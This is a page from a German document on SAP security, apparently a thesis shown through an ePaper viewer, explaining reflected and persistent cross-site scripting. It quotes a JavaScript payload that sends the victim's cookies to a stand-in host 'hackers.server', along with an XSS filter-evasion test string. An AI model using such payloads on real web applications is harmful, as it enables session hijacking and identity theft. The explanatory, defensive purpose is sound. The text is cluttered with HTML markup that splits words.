Sicherheit von SAP in Bezug auf neue Technologien
Sicherheit von SAP in Bezug auf neue Technologien
Sicherheit von SAP in Bezug auf neue Technologien
Erfolgreiche ePaper selbst erstellen
Machen Sie aus Ihren PDF Publikationen ein blätterbares Flipbook mit unserer einzigartigen Google optimierten e-Paper Software.
<strong>Sicherheit</strong> <strong>von</strong> <strong>SAP</strong> <strong>in</strong> <strong>Bezug</strong> <strong>auf</strong> <strong>neue</strong> <strong>Technologien</strong><br />
geben, der dann mit Werten wie document.location<br />
.replace('http://hackers.server/stealcookie.cgi?'+document.cook<br />
ie); <strong>auf</strong>gerufen wird. Wie <strong>in</strong> diesem Beispiel ersichtlich erhält<br />
der Angreifer die Cookies des Opfers, unter denen sich auch e<strong>in</strong>es bef<strong>in</strong>den<br />
kann, das e<strong>in</strong>e gültige Sitzung <strong>auf</strong> der verwundbaren Applikation darstellt.<br />
Der Angreifer könnte nun also, obwohl er selbst ke<strong>in</strong>e oder andere<br />
Berechtigungen <strong>in</strong> der Applikation hat, <strong>in</strong> der Identität des Opfers arbeiten.<br />
Der Angriff, <strong>in</strong> diesem Fall der Wert des Parameters, muss jedoch nicht<br />
immer so e<strong>in</strong>deutig se<strong>in</strong>. Es gibt e<strong>in</strong>e Vielzahl an Variationen um z.B. e<strong>in</strong>e<br />
E<strong>in</strong>- bzw. Ausgabeprüfung zu umgehen. Das folgende Beispiel würde bei<br />
e<strong>in</strong>er Verwundbaren Applikation e<strong>in</strong>e Alertbox mit XSS als Text erzeugen 15 :<br />
'';!--"=&{()}<br />
<br />
<br />
Wie zuvor schon angedeutet, unterscheidet man bei Cross-Site-Script<strong>in</strong>g<br />
zwischen 2 Arten:<br />
nicht persistent<br />
persistent<br />
Nicht persistentes Cross-Site-Script<strong>in</strong>g verhält sich wie <strong>in</strong> dem Beispiel<br />
zuvor beschrieben. Es ist grundsätzlich nur für e<strong>in</strong>e Sitzung gültig und das<br />
Opfer muss den <strong>in</strong>itial gesendeten bzw. verwendeten L<strong>in</strong>k aktivieren.<br />
Bei e<strong>in</strong>em persistenten Cross-Site-Script<strong>in</strong>g wird der L<strong>in</strong>k <strong>in</strong> e<strong>in</strong>em System<br />
gespeichert, so dass dieser den Opfern nicht gesordert gesendet werden<br />
muss. Dadurch trifft der Angriff jeden, der die Daten und damit das Skript<br />
abruft. Denkbar ist dies z.B. <strong>in</strong> e<strong>in</strong>em Forum, dessen<br />
Mitgliederbeschreibung für Cross-Site-Script<strong>in</strong>g anfällig ist und somit jeder,<br />
der die Mitgliederbeschreibung abruft, <strong>von</strong> der Attacke betroffen ist, ohne<br />
dass <strong>von</strong> den Opfern e<strong>in</strong>e weitere Aktion notwendig ist 16 .<br />
E<strong>in</strong>e anschauliche Demonstration, was mit Cross-Site-Script<strong>in</strong>g möglich ist,<br />
f<strong>in</strong>det sich <strong>auf</strong> www.b<strong>in</strong>dshell.net/beef/.<br />
15 http://ha.ckers.org/xss.html<br />
16 http://www.heise.de/newsticker/meldung/100976<br />
Damian Schlager Seite 24